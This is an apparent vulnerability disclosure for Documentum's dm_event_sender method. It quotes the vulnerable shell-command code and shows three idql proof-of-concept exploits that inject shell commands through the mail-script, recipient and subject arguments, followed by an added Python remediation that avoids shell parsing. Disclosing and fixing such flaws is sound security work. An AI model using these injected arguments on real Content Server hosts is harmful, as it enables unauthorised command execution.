documentum security vulnerabilities: dm_event_sender

dm_event_sender.ebs does not check its input parameters, so any user is able to execute shell commands on the Content Server host using a DQL query.

'Send the completed email:

If platform$ = "WIN32" Then
    mailScript$ = ".\smail.exe"
    mailCommand$ = mailScript$ _
    & " " & "-nohttp" _
    & " " & "-delete_contents" _
    & " " & "-S " & subject_line$ _
    & " " & "-A " & recipient_name$ _
    & " " & "-F " & temp_file_name$ _
    & " " & "-Server " & smtp_server$ _
    & " " & "-M " & mail_user_name$
Else
    ' We must change the recipient if this is a single message bulk-mail.
    If do_single_message = True Then
        recipient_name$ = sender_name$
    End If

    mailCommand$ = mailScript _
    & " " & "-delete_contents" _
    & " " & subject_line$ _
    & " """ & recipient_name$ & """" _
    & " " & temp_file_name$
End If

If debug = "1" Then
  LogMsg("mailCommand= " & mailCommand$)
End If

result% = ShellSync(mailCommand)

exploitation of mailScript parameter:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender',
> arguments='"" "" "" "" "" "" "" "" "" "" "" "" ""
> "" "" "" "" "" "" "" "" "" "" "" "" "" "" "/tmp/xxxx"
> "/bin/echo dm_event_sender_has_vulnerability > /tmp/test.txt ;"
> " " ""'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
dm_event_sender_has_vulnerability
 ~]$

exploitation of recipient_name parameter:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender', 
> arguments='"" "" "" "" "" "" "" "" "" "" "" "" "" "" "" 
> "\"; /bin/echo dm_event_sender_has_vulnerability > /tmp/test.txt ;\"" 
> "" "" "" "" "" "" "" "" "" "" "" "/tmp/xxxx" "" " " ""'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
dm_event_sender_has_vulnerability
 ~]$

exploitation of subject_line:

 ~]$ cat /tmp/test.txt
cat: /tmp/test.txt: No such file or directory
 ~]$ idql repo -Uuser -Ppassword > /dev/null <<_EOF_
> execute do_method with method='dm_event_sender',
> arguments='"" "" "\`touch /tmp/text.txt\`"
> "" "" "" "" "" "" "" "" "" "" "" "" "" "WIN32" "xxx"
> "" "" "" "" "" "" "" "" "" "/tmp/xxxx" "" " " "127.0.0.1"'
> go
> _EOF_
 ~]$ cat /tmp/test.txt
 ~]$

This vulnerability was reported as CS-44443 (Security vulnerability with dm_event_sender allows execution of applications on Content Server host).
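
The ShellSync call above is injectable because caller-supplied values are concatenated into one string that a shell then parses. As an added example (not code from this post or from Documentum), the Python below builds the non-WIN32 command as an argument vector instead, with the mail script checked against an allow-list and the recipient validated; the script path, the recipient pattern and the function names are assumptions.

```python
import json
import re
import subprocess
import sys

# Assumption: placeholder path of the one mail helper allowed to run.
ALLOWED_MAIL_SCRIPTS = {"/path/to/allowed_mail_script.sh"}
# Assumption: recipients are plain e-mail addresses; adapt to local rules.
RECIPIENT_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\Z")


def build_mail_argv(mail_script, subject_line, recipient_name, temp_file_name):
    """Build the non-WIN32 mail command as an argv list, or raise ValueError."""
    if mail_script not in ALLOWED_MAIL_SCRIPTS:
        raise ValueError("mail script is not on the allow-list")
    if not RECIPIENT_RE.match(recipient_name):
        raise ValueError("recipient is not a plain e-mail address")
    for value in (subject_line, temp_file_name):
        # NUL and newlines have no place in a subject or a file name.
        if any(ch in value for ch in "\x00\r\n"):
            raise ValueError("control character in argument")
    # One list element per argument: nothing here is parsed by a shell.
    return [mail_script, "-delete_contents", subject_line,
            recipient_name, temp_file_name]


def received_args(args):
    """Start a child without a shell and return the arguments it received."""
    child = [sys.executable, "-c",
             "import json, sys; print(json.dumps(sys.argv[1:]))"]
    done = subprocess.run(child + list(args), capture_output=True,
                          text=True, check=True)
    return json.loads(done.stdout)


if __name__ == "__main__":
    # Constructed input: a subject full of shell metacharacters.
    subject = "Report `date`; echo x > y"
    argv = build_mail_argv("/path/to/allowed_mail_script.sh", subject,
                           "user@example.com", "/tmp/xxxx")
    # The helper itself is not run; a stand-in child shows what it would see.
    print(received_args(argv[1:]))
```

The subject arrives in the child as one literal argument, backticks and semicolon included, and a mail script or recipient that fails validation is rejected before any process is started.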
